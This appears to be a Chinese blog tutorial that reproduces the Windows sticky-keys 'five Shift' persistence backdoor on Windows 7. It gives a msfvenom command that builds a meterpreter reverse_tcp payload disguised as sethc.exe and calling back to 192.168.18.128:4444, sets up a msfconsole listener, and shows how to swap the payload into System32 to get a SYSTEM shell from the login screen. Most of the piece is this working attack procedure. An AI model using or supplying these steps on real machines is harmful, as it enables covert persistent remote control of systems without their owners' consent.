Windows5次shift维权漏洞复现

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

操作系统: Windows 7 旗舰版

工具: kali系统的msfconsole

5次shift维权原理

Windows系统中,5次shift键可以触发粘滞键,也就是C:\Windows\System32\sethc.exe,我们将cmd.exe改成sethc.exe并替换掉原来的粘滞键,就可以在登录界面通过5次shift键执行cmd,并且是system权限

除此以外,还可以使用其他工具替换sethc.exe

第一步,使用kali的msfconsole生成木马工具

1.开启MSF

msfconsole

 2.使用开发模块

use exploit/multi/handler

 3.生成木马,lhost写自己的ip,lport写自己的端口,作用是反弹shell到指定ip的端口

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.128 lport=4444 -f exe -o sethc.exe

4.因为我是在桌面打开的终端,生成的木马文件会在用户的根目录下,打开另一个终端查看文件位置

第二步,监听端口,接收反弹的shell

1.生成payload

set payload windows/meterpreter/reverse_tcp

2.设置反弹shell的位置( 自己的ip )

set lhost 192.168.18.128

3.设置反弹的端口

set lport 4444

4.开启监听

exploit

第三步,替换sethc.exe

将生成的木马工具上传到目标主机的c:/windows/system32目录下,并替换原有的sethc.exe

源sethc.exe不能直接修改或删除,需要修改权限

第四步,5次shift触发sethc.exe并反弹shell

1.在目标主机按5次shift触发sethc.exe,没有任何反应,因为程序被替换了

2.查看kali的监听状态,输入 shell 可进入目标主机的命令行,并执行系统命令

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值